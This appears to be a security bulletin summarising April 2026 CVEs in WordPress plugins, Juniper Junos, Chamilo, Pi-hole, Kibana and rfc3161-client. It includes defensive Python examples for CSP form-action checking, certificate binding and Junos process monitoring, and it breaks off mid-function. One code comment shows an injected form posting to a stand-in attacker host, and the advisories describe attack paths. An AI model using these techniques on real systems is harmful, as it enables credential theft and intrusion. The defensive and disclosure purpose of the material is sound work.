    https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Form_List.php#L122
    https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Memberlist_List.php#L115
    https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_form.php#L2
    https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_memberlist.php#L2
    https://plugins.trac.wordpress.org/changeset?old_path=%2Fwebling/tags/3.9.0&new_path=%2Fwebling/tags/3.9.1

    magicplugins -- Magic Conversation For Gravity Forms
    The Magic Conversation For Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'magic-conversation' shortcode in all versions up to, and including, 3.0.97 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
    Published: 2026-04-08  CVSS: 6.4  Source Info: CVE-2026-1396 [ https://www.cve.org/CVERecord?id=CVE-2026-1396 ]
    Patch Info:
    https://www.wordfence.com/threat-intel/vulnerabilities/id/bc425c4a-cb4e-4f50-b85b-8c4c7778c073?source=cve
    https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-forms/trunk/main.php#L1627
    https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-forms/tags/3.0.96/main.php#L1627
    https://plugins.trac.wordpress.org/changeset/3482359/magic-conversation-for-gravity-forms/trunk/main.php

    realmag777 -- BEAR Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net
    The BEAR - Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing nonce validation on the woobe_redraw_table_row() function. This makes it possible for unauthenticated attackers to update WooCommerce product data including prices, descriptions, and other product fields via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link.
    Published: 2026-04-08  CVSS: 6.5  Source Info: CVE-2026-1672 [ https://www.cve.org/CVERecord?id=CVE-2026-1672 ]
    Patch Info:
    https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b5faa-1a29-4fa7-9146-d782adce0b1f?source=cve
    https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L782
    https://plugins.trac.wordpress.org/changeset/3457263/
    https://plugins.trac.wordpress.org/changeset/3465138/

    wpeverest -- User Registration & Membership Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder
    The User Registration & Membership - Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder plugin for WordPress is vulnerable to SQL Injection via the 'membership_ids[]' parameter in all versions up to, and including, 5.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
    Published: 2026-04-08  CVSS: 6.5  Source Info: CVE-2026-1865 [ https://www.cve.org/CVERecord?id=CVE-2026-1865 ]
    Patch Info:
    https://www.wordfence.com/threat-intel/vulnerabilities/id/07c79459-66b8-4c93-a1cd-6e3ede95643f?source=cve
    https://plugins.trac.wordpress.org/changeset/3469042/user-registration

    n/a -- Intel(R) Pentium(R) Processor Silver Series, Intel(R) Celeron(R) Processor J Series, Intel(R) Celeron(R) Processor N Series
    Use of Default Cryptographic Key in the hardware for some Intel(R) Pentium(R) Processor Silver Series, Intel(R) Celeron(R) Processor J Series, Intel(R) Celeron(R) Processor N Series may allow an escalation of privilege. Hardware reverse engineer adversary with a privileged user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via physical access when attack requirements are present with special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (none) impacts.
    Published: 2026-04-08  CVSS: 6.6  Source Info: CVE-2026-20709 [ https://www.cve.org/CVERecord?id=CVE-2026-20709 ]
    Patch Info: https://intel.com/content/www/us/en/security-center/advisory/intel-sa-00609.html

    Juniper Networks -- Junos Space
    An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the list filter field that, when visited by another user, enables the attacker to execute commands with the target's permissions, including an administrator. This issue affects all versions of Junos Space before 24.1R5 Patch V3.
    Published: 2026-04-09  CVSS: 6.1  Source Info: CVE-2026-21904 [ https://www.cve.org/CVERecord?id=CVE-2026-21904 ]
    Patch Info: https://kb.juniper.net/JSA106003

    Juniper Networks -- JSI LWC
    A Permissive List of Allowed Input vulnerability in the CLI of Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows a local, high privileged attacker to escalate their privileges to root. The CLI menu accepts input without carefully validating it, which allows for shell command injection. These shell commands are executed with root permissions and can be used to gain complete control of the system. This issue affects all JSI vLWC versions before 3.0.94.
    Published: 2026-04-09  CVSS: 6.7  Source Info: CVE-2026-21915 [ https://www.cve.org/CVERecord?id=CVE-2026-21915 ]
    Patch Info: https://kb.juniper.net/JSA106016

Juniper Networks--Junos OS
An Incorrect Synchronization vulnerability in the management daemon (mgd) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based attacker with low privileges to cause a complete Denial-of-Service (DoS) of the management plane. When NETCONF sessions are quickly established and disconnected, a locking issue causes mgd processes to hang in an unusable state. When the maximum number of mgd processes has been reached, no new logins are possible. This leads to the inability to manage the device and requires a power-cycle to recover. This issue can be monitored by checking for mgd processes in lockf state in the output of 'show system processes extensive':
    user@host> show system processes extensive | match mgd
    <pid> root  20  0  501M  4640K  lockf  1  0:01  0.00%  mgd
If the system can still be accessed (either via the CLI or as root, which might still be possible as a last resort as this won't invoke mgd), mgd processes in this state can be killed with 'request system process terminate <PID>' from the CLI or with 'kill -9 <PID>' from the shell.
This issue affects Junos OS:
  * 23.4 versions before 23.4R2-S4,
  * 24.2 versions before 24.2R2-S1,
  * 24.4 versions before 24.4R1-S3, 24.4R2.
This issue does not affect Junos OS versions before 23.4R1.
Junos OS Evolved:
  * 23.4 versions before 23.4R2-S5-EVO,
  * 24.2 versions before 24.2R2-S1-EVO,
  * 24.4 versions before 24.4R1-S3-EVO, 24.4R2-EVO.
This issue does not affect Junos OS Evolved versions before 23.4R1-EVO.
Published: 2026-04-09  CVSS: 6.5  CVE-2026-21919 [ https://www.cve.org/CVERecord?id=CVE-2026-21919 ]
https://kb.juniper.net/JSA106019

addfunc--AddFunc Head & Footer Code
The AddFunc Head & Footer Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `aFhfc_head_code`, `aFhfc_body_code`, and `aFhfc_footer_code` post meta values in all versions up to, and including, 2.3. This is due to the plugin outputting these meta values without any sanitization or escaping. While the plugin restricts its own metabox and save handler to administrators via `current_user_can('manage_options')`, it does not use `register_meta()` with an `auth_callback` to protect these meta keys. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts via the WordPress Custom Fields interface that execute when an administrator previews or views the post.
Published: 2026-04-10  CVSS: 6.4  CVE-2026-2305 [ https://www.cve.org/CVERecord?id=CVE-2026-2305 ]
https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2d1a67-1d9b-4b73-988e-085eaa7474c6?source=cve
https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L63
https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L74
https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L85
https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L63
https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L74
https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L85
https://plugins.trac.wordpress.org/changeset?old_path=%2Faddfunc-head-footer-code/tags/2.3&new_path=%2Faddfunc-head-footer-code/tags/2.4

blubrry--PowerPress Podcasting plugin by Blubrry
The Blubrry PowerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'powerpress' and 'podcast' shortcodes in versions up to, and including, 11.15.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2026-04-08  CVSS: 6.4  CVE-2026-2988 [ https://www.cve.org/CVERecord?id=CVE-2026-2988 ]
https://www.wordfence.com/threat-intel/vulnerabilities/id/de25459d-9e19-4e3e-982f-0b34fa89dc30?source=cve
https://plugins.trac.wordpress.org/changeset/3473781/powerpress

fernandobt--List category posts
The List category posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catlist' shortcode in all versions up to, and including, 0.94.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2026-04-09  CVSS: 6.4  CVE-2026-3005 [ https://www.cve.org/CVERecord?id=CVE-2026-3005 ]
https://www.wordfence.com/threat-intel/vulnerabilities/id/1a93ff8a-364f-4ec4-9c32-208c7a3e1fc1?source=cve
https://plugins.trac.wordpress.org/browser/list-category-posts/trunk/include/lcp-thumbnail.php#L95
https://plugins.trac.wordpress.org/changeset/3482733/

uniquecodergmailcom--Pinterest Site Verification plugin using Meta Tag
The Pinterest Site Verification plugin using Meta Tag plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'post_var' parameter in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2026-04-08  CVSS: 6.4  CVE-2026-3142 [ https://www.cve.org/CVERecord?id=CVE-2026-3142 ]
https://www.wordfence.com/threat-intel/vulnerabilities/id/7ccb7534-b588-4bdd-9627-0e38c0ee5e8a?source=cve
https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L160
https://plugins.trac.wordpress.org/browser/pinterest-site-verification/trunk/PinterestMetaTagSiteVerification.php#L160
https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L172
https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L180
https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L92
https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L132
https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L214

wpchill--Strong Testimonials
The Strong Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's testimonial_view shortcode in all versions up to, and including, 3.2.21 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2026-04-08  CVSS: 6.4  CVE-2026-3239 [ https://www.cve.org/CVERecord?id=CVE-2026-3239 ]
https://www.wordfence.com/threat-intel/vulnerabilities/id/88d769cd-bea8-42e4-80a8-a77c0699b50c?source=cve
https://plugins.trac.wordpress.org/changeset/3470120/strong-testimonials

posimyththemes--The Plus Addons for Elementor Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce
The "The Plus Addons for Elementor - Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Progress Bar shortcode in all versions up to, and including, 6.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2026-04-08  CVSS: 6.4  CVE-2026-3311 [ https://www.cve.org/CVERecord?id=CVE-2026-3311 ]
https://www.wordfence.com/threat-intel/vulnerabilities/id/6367c5fc-f664-4105-a1b7-a93fb0a2392b?source=cve
https://plugins.trac.wordpress.org/changeset/3473275/the-plus-addons-for-elementor-page-builder

chamilo--chamilo-lms
Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the REST API stats endpoint allows any authenticated user (including low-privilege students with ROLE_USER) to read any other user's learning progress, certificates, and gradebook scores for any course, without enrollment or supervisory relationship. This vulnerability is fixed in 2.0.0-RC.3.
Published: 2026-04-10  CVSS: 6.5  CVE-2026-33141 [ https://www.cve.org/CVERecord?id=CVE-2026-33141 ]
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-j2pr-2r5w-jrpj
https://github.com/chamilo/chamilo-lms/commit/792ba05953470ca971617fe2674ed14c1479fa80

pi-hole--web
Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, a reflected DOM-based XSS vulnerability in taillog.js allows an unauthenticated attacker to inject arbitrary HTML into the Pi-hole admin interface by crafting a malicious URL. The file query parameter is interpolated into an innerHTML assignment without escaping. Because the Content-Security-Policy is missing the form-action directive, injected <form> elements can exfiltrate credentials to an external origin. This vulnerability is fixed in 6.5.
Published: 2026-04-06  CVSS: 6.1  CVE-2026-33403 [ https://www.cve.org/CVERecord?id=CVE-2026-33403 ]
https://github.com/pi-hole/web/security/advisories/GHSA-7xqw-r9pr-qv59

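The second half of the Pi-hole finding is easy to miss when reviewing a policy: form-action is one of the CSP directives that does not fall back to default-src, so a header with a strict default-src and no form-action still lets an injected <form> post to any origin. The checker below is an added example, not Pi-hole's code; the two sample policies are constructed for illustration and are not Pi-hole's real headers. Escaping the file parameter before it reaches innerHTML remains the primary fix; the directive is defence in depth.

```python
"""Check a Content-Security-Policy header for the form-action gap described
above. Added example, not Pi-hole's code; sample policies are constructed."""
from typing import Dict, List, Optional

# CSP directives that never fall back to default-src (CSP Level 3). An injected
# <form action="https://attacker.example/"> is governed only by form-action.
NO_FALLBACK = frozenset({
    "base-uri", "form-action", "frame-ancestors", "sandbox",
    "report-uri", "report-to", "upgrade-insecure-requests",
})


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a CSP header into {directive: [source expressions]}.
    Browsers honour only the first occurrence of a repeated directive."""
    policy: Dict[str, List[str]] = {}
    for raw in header.split(";"):
        tokens = raw.split()
        if not tokens:
            continue
        policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def effective_sources(policy: Dict[str, List[str]], directive: str) -> Optional[List[str]]:
    """Source list that actually applies to `directive`, or None if unrestricted."""
    if directive in policy:
        return policy[directive]
    if directive in NO_FALLBACK:
        return None                      # no fallback: any target is allowed
    return policy.get("default-src")     # fetch directives inherit default-src


def form_action_findings(header: str) -> List[str]:
    """Human-readable findings about where injected forms may submit."""
    sources = effective_sources(parse_csp(header), "form-action")
    if sources is None:
        return ["form-action missing: injected <form> elements may submit to any origin"]
    findings = []
    if "*" in sources:
        findings.append("form-action '*' allows submission to any origin")
    for src in sources:
        if src.startswith("http:"):
            findings.append(f"form-action permits cleartext target {src}")
    return findings


# Constructed sample policies (not Pi-hole's actual headers).
WEAK_POLICY = "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'"
FIXED_POLICY = "default-src 'self'; form-action 'self'; script-src 'self'"

if __name__ == "__main__":
    for label, hdr in (("weak", WEAK_POLICY), ("fixed", FIXED_POLICY)):
        print(label, form_action_findings(hdr) or ["ok"])
```

Run it against the headers your own admin pages return; a policy that passes every scanner's script-src check can still fail this one.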
Elastic--Kibana
Server-Side Request Forgery (CWE-918) in Kibana One Workflow can lead to information disclosure. An authenticated user with workflow creation and execution privileges can bypass host allowlist restrictions in the Workflows Execution Engine, potentially exposing sensitive internal endpoints and data.
Published: 2026-04-08  CVSS: 6.8  CVE-2026-33458 [ https://www.cve.org/CVERecord?id=CVE-2026-33458 ]
https://discuss.elastic.co/t/kibana-9-3-3-security-update-esa-2026-28/385815

Elastic--Kibana
Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated user with access to the automatic import feature can submit specially crafted requests with excessively large input values. When multiple such requests are sent concurrently, the backend services become unstable, resulting in service disruption and deployment unavailability for all users.
Published: 2026-04-08  CVSS: 6.5  CVE-2026-33459 [ https://www.cve.org/CVERecord?id=CVE-2026-33459 ]
https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-26/385814

chamilo--chamilo-lms
Chamilo LMS is a learning management system. Prior to 1.11.38, the get_user_info_from_username REST API endpoint returns personal information (email, first name, last name, user ID, active status) of any user to any authenticated user, including students. There is no authorization check. This vulnerability is fixed in 1.11.38.
Published: 2026-04-10  CVSS: 6.5  CVE-2026-33708 [ https://www.cve.org/CVERecord?id=CVE-2026-33708 ]
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999
https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2

pi-hole--pi-hole
Pi-hole is a Linux network-level advertisement and Internet tracker blocking application. Version 6.4 has a local privilege-escalation vulnerability that allows code execution as root from the low-privilege pihole account. Important context: the pihole account uses nologin, so this is not a direct interactive-login issue. However, nologin does not prevent code from running as UID pihole if a Pi-hole component is compromised. In that realistic post-compromise scenario, attacker-controlled content in /etc/pihole/versions is sourced by root-run Pi-hole scripts, leading to root code execution. This vulnerability is fixed in 6.4.1.
Published: 2026-04-06  CVSS: 6.4  CVE-2026-33727 [ https://www.cve.org/CVERecord?id=CVE-2026-33727 ]
https://github.com/pi-hole/pi-hole/security/advisories/GHSA-c935-8g63-qp74

chamilo--chamilo-lms
Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, any authenticated user (including ROLE_STUDENT) can enumerate all platform users and access personal information (email, phone, roles) via GET /api/users, including administrator accounts. This vulnerability is fixed in 2.0.0-RC.3.
Published: 2026-04-10  CVSS: 6.5  CVE-2026-33736 [ https://www.cve.org/CVERecord?id=CVE-2026-33736 ]
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-fp2p-fj6c-x3x9
https://github.com/chamilo/chamilo-lms/commit/1739371ce1c562c007c7f5d53e6d65b7a4ff4109

trailofbits--rfc3161-client
rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulnerability in rfc3161-client's signature verification allows any attacker to impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic flaw in how the library extracts the leaf certificate from an unordered PKCS#7 bag of certificates, an attacker can append a spoofed certificate matching the target common_name and Extended Key Usage (EKU) requirements. This tricks the library into verifying these authorization rules against the forged certificate while validating the cryptographic signature against an actual trusted TSA (such as FreeTSA), thereby bypassing the intended TSA authorization pinning entirely. This vulnerability is fixed in 1.0.6.
Published: 2026-04-08  CVSS: 6.2  CVE-2026-33753 [ https://www.cve.org/CVERecord?id=CVE-2026-33753 ]
https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj

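The general lesson of the rfc3161-client entry applies to any CMS or PKCS#7 verifier: authorization checks (pinned name, EKU) must be evaluated on the same certificate that the SignerInfo names as the signer, never on whichever certificate in the bag happens to satisfy them. The model below is an added example and is not rfc3161-client's code. Certificates are plain records standing in for X.509 objects, `signer_serial` stands in for the SignerInfo issuer-and-serial identifier, and "trusted" is modelled as a serial lookup where a real verifier would build a chain and check the signature. All names and serials are constructed; only the TimeStamping EKU OID is the real id-kp-timeStamping value.

```python
"""Model of the leaf-selection flaw described above. Added example, not
rfc3161-client's code; certificates, serials and trust are toy stand-ins."""
from dataclasses import dataclass
from typing import List, Set, Tuple

ID_KP_TIMESTAMPING = "1.3.6.1.5.5.7.3.8"   # real id-kp-timeStamping OID


@dataclass(frozen=True)
class Cert:
    serial: int
    common_name: str
    ekus: Tuple[str, ...] = ()


@dataclass
class TimeStampToken:
    signer_serial: int          # SignerInfo.sid: which cert's key produced the signature
    certificates: List[Cert]    # unordered PKCS#7 certificate bag, attacker-controlled


def _signature_valid(token: TimeStampToken, trusted_serials: Set[int]) -> bool:
    """Stand-in for cryptographic verification: the signing cert must be present
    in the bag and chain to a trust anchor (modelled as membership in trusted_serials)."""
    return any(c.serial == token.signer_serial and c.serial in trusted_serials
               for c in token.certificates)


def _matches_policy(cert: Cert, pinned_cn: str) -> bool:
    """The authorization rules the advisory mentions: pinned CN plus TimeStamping EKU."""
    return cert.common_name == pinned_cn and ID_KP_TIMESTAMPING in cert.ekus


def verify_vulnerable(token: TimeStampToken, pinned_cn: str, trusted_serials: Set[int]) -> bool:
    """Flawed shape: picks 'the leaf' by scanning the bag for any cert that satisfies
    the policy, independently of which cert actually signed. An appended cert can
    satisfy CN/EKU while a different, genuinely trusted TSA satisfies the signature."""
    policy_cert = next((c for c in token.certificates if _matches_policy(c, pinned_cn)), None)
    return policy_cert is not None and _signature_valid(token, trusted_serials)


def verify_fixed(token: TimeStampToken, pinned_cn: str, trusted_serials: Set[int]) -> bool:
    """Binds both checks to the single certificate named by SignerInfo."""
    signers = [c for c in token.certificates if c.serial == token.signer_serial]
    if len(signers) != 1:
        return False
    leaf = signers[0]
    return _signature_valid(token, trusted_serials) and _matches_policy(leaf, pinned_cn)


# Constructed scenario: the verifier pins CN "Example Corp TSA", but its trust
# store also contains a public TSA, as in the advisory's FreeTSA example.
CORP_TSA = Cert(2002, "Example Corp TSA", (ID_KP_TIMESTAMPING,))
PUBLIC_TSA = Cert(1001, "Public TSA", (ID_KP_TIMESTAMPING,))
SPOOFED = Cert(9999, "Example Corp TSA", (ID_KP_TIMESTAMPING,))  # attacker-minted, untrusted
TRUSTED = {CORP_TSA.serial, PUBLIC_TSA.serial}
PINNED_CN = "Example Corp TSA"

LEGIT_TOKEN = TimeStampToken(signer_serial=CORP_TSA.serial, certificates=[CORP_TSA])
FORGED_TOKEN = TimeStampToken(signer_serial=PUBLIC_TSA.serial, certificates=[PUBLIC_TSA, SPOOFED])

if __name__ == "__main__":
    for name, tok in (("legit", LEGIT_TOKEN), ("forged", FORGED_TOKEN)):
        print(name, "vulnerable:", verify_vulnerable(tok, PINNED_CN, TRUSTED),
              "fixed:", verify_fixed(tok, PINNED_CN, TRUSTED))
```

The forged token is signed by a TSA the verifier genuinely trusts, so the signature check passes; only binding the policy check to the signer's own certificate exposes the mismatch.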
Juniper Networks--Junos OS
An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to bypass the configured firewall filter and access the control-plane of the device. On MX platforms with MPC10, MPC11, LC4800 or LC9600 line cards, and MX304, firewall filters applied on a loopback interface lo0.n (where n is a non-0 number) don't get executed when lo0.n is in the global VRF / default routing-instance. An affected configuration would be:
    user@host# show configuration interfaces lo0 | display set
    set interfaces lo0 unit 1 family inet filter input <filter-name>
where a firewall filter is applied to a non-0 loopback interface, but that loopback interface is not referred to in any routing-instance (RI) configuration, which implies that it's used in the default RI. The issue can be observed with the CLI command:
    user@device> show firewall counter filter <filter_name>
not showing any matches.
This issue affects Junos OS on MX Series:
  * all versions before 23.2R2-S6,
  * 23.4 versions before 23.4R2-S7,
  * 24.2 versions before 24.2R2,
  * 24.4 versions before 24.4R2.
Published: 2026-04-09  CVSS: 6.5  CVE-2026-33774 [ https://www.cve.org/CVERecord?id=CVE-2026-33774 ]
https://kb.juniper.net/JSA107865

Juniper Networks--Junos OS
A Missing Release of Memory after Effective Lifetime vulnerability in the BroadBand Edge subscriber management daemon (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). If the authentication packet-type option is configured and a received packet does not match that packet type, the memory leak occurs. When all memory available to bbe-smgd has been consumed, no new subscribers will be able to login. The memory utilization of bbe-smgd can be monitored with the following show command:
    user@host> show system processes extensive | match bbe-smgd
The below log message can be observed when this limit has been reached:
    bbesmgd[<PID>]: %DAEMON-3-SMD_DPROF_RSMON_ERROR: Resource unavailability, Reason: Daemon Heap Memory exhaustion
This issue affects Junos OS on MX Series:
  * all versions before 22.4R3-S8,
  * 23.2 versions before 23.2R2-S5,
  * 23.4 versions before 23.4R2-S6,
  * 24.2 versions before 24.2R2-S2,
  * 24.4 versions before 24.4R2,
  * 25.2 versions before 25.2R2.
Published: 2026-04-09  CVSS: 6.5  CVE-2026-33775 [ https://www.cve.org/CVERecord?id=CVE-2026-33775 ]
https://kb.juniper.net/JSA107821

Juniper Networks--Junos OS
An Improper Following of a Certificate's Chain of Trust vulnerability in J-Web of Juniper Networks Junos OS on SRX Series allows a PITM to intercept the communication of the device and get access to confidential information and potentially modify it. When an SRX device is provisioned to connect to Security Director (SD) cloud, it doesn't perform sufficient verification of the received server certificate. This allows a PITM to intercept the communication between the SRX and SD cloud and access credentials and other sensitive information.
This issue affects Junos OS:
  * all versions before 22.4R3-S9,
  * 23.2 versions before 23.2R2-S6,
  * 23.4 versions before 23.4R2-S7,
  * 24.2 versions before 24.2R2-S3,
  * 24.4 versions before 24.4R2-S2,
  * 25.2 versions before 25.2R1-S2, 25.2R2.
Published: 2026-04-09  CVSS: 6.5  CVE-2026-33779 [ https://www.cve.org/CVERecord?id=CVE-2026-33779 ]
https://kb.juniper.net/JSA107823

Juniper Networks--Junos OS
A Missing Release of Memory after Effective Lifetime vulnerability in the Layer 2 Address Learning Daemon (l2ald) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent, unauthenticated attacker to cause a memory leak ultimately leading to a Denial of Service (DoS). In an EVPN-MPLS scenario, routes learned from remote multi-homed Provider Edge (PE) devices are programmed as ESI routes. Due to a logic issue in the l2ald memory management, memory allocated for these routes is not released when there is churn for these routes. As a result, memory leaks in the l2ald process which will ultimately lead to a crash and restart of l2ald. Use the following command to monitor the memory consumption by l2ald:
    user@device> show system process extensive | match "PID|l2ald"
This issue affects Junos OS:
  * all versions before 22.4R3-S5,
  * 23.2 versions before 23.2R2-S3,
  * 23.4 versions before 23.4R2-S4,
  * 24.2 versions before 24.2R2.
Junos OS Evolved:
  * all versions before 22.4R3-S5-EVO,
  * 23.2 versions before 23.2R2-S3-EVO,
  * 23.4 versions before 23.4R2-S4-EVO,
  * 24.2 versions before 24.2R2-EVO.
Published: 2026-04-09  CVSS: 6.5  CVE-2026-33780 [ https://www.cve.org/CVERecord?id=CVE-2026-33780 ]
https://kb.juniper.net/JSA107819

Juniper Networks--Junos OS
An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on specific EX and QFX Series devices allows an unauthenticated, adjacent attacker to cause a complete Denial of Service (DoS). On EX4k and QFX5k platforms configured as service-provider edge devices, if L2PT is enabled on the UNI and VSTP is enabled on the NNI in VXLAN scenarios, receiving VSTP BPDUs on the UNI leads to packet buffer allocation failures, after which the device no longer passes traffic until it is manually recovered with a restart.
This issue affects Junos OS:
  * 24.4 releases before 24.4R2,
  * 25.2 releases before 25.2R1-S1, 25.2R2.
This issue does not affect Junos OS releases before 24.4R1.
Published: 2026-04-09  CVSS: 6.5  CVE-2026-33781 [ https://www.cve.org/CVERecord?id=CVE-2026-33781 ]
https://kb.juniper.net/JSA107869

Juniper Networks--Junos OS
A Missing Release of Memory after Effective Lifetime vulnerability in the DHCP daemon (jdhcpd) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a memory leak that will eventually cause a complete Denial-of-Service (DoS). In a DHCPv6 over PPPoE, or DHCPv6 over VLAN with Active leasequery or Bulk leasequery scenario, every subscriber logout will leak a small amount of memory. When all available memory has been exhausted, jdhcpd will crash and restart, which causes a complete service impact until the process has recovered. The memory usage of jdhcpd can be monitored with:
    user@host> show system processes extensive | match jdhcpd
This issue affects Junos OS:
  * all versions before 22.4R3-S1,
  * 23.2 versions before 23.2R2,
  * 23.4 versions before 23.4R2.
Published: 2026-04-09  CVSS: 6.5  CVE-2026-33782 [ https://www.cve.org/CVERecord?id=CVE-2026-33782 ]
https://kb.juniper.net/JSA107820

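Several of the Junos advisories in this bulletin point operators at the same data source: the mgd entry (CVE-2026-21919) says to look for mgd processes in the lockf state in 'show system processes extensive', and the bbe-smgd, l2ald and jdhcpd memory-leak entries say to watch that command's output for growing memory use. The parser below is an added example, not Juniper's code, and serves all four entries: it reads that process table from text, flags hung mgd instances, and compares resident memory of the named daemons across two snapshots. The two snapshots are constructed to match the column layout quoted in the mgd advisory (PID USERNAME PRI NICE SIZE RES STATE C TIME WCPU COMMAND) and are not captured from a device; columns are read from the right so an extra THR column on other releases would not break parsing.

```python
"""Parse 'show system processes extensive' text, flag mgd in lockf, and spot
memory growth in subscriber/L2 daemons. Added example, not Juniper's code;
snapshots below are constructed, not device output."""
from typing import Dict, List, NamedTuple, Sequence


class Proc(NamedTuple):
    pid: int
    user: str
    size_kb: int
    res_kb: int
    state: str
    command: str


_UNITS = {"K": 1, "M": 1024, "G": 1024 * 1024}


def _to_kb(field: str) -> int:
    """'501M' -> 513024, '4640K' -> 4640; a bare number is taken as KB."""
    unit = field[-1].upper()
    if unit in _UNITS:
        return int(field[:-1]) * _UNITS[unit]
    return int(field)


def parse_processes(text: str) -> List[Proc]:
    """Keep only process rows (first token numeric); skip header/summary lines."""
    procs = []
    for line in text.splitlines():
        t = line.split()
        if len(t) < 11 or not t[0].isdigit():
            continue
        procs.append(Proc(pid=int(t[0]), user=t[1], size_kb=_to_kb(t[-7]),
                          res_kb=_to_kb(t[-6]), state=t[-5], command=t[-1]))
    return procs


def hung_mgd_pids(procs: Sequence[Proc]) -> List[int]:
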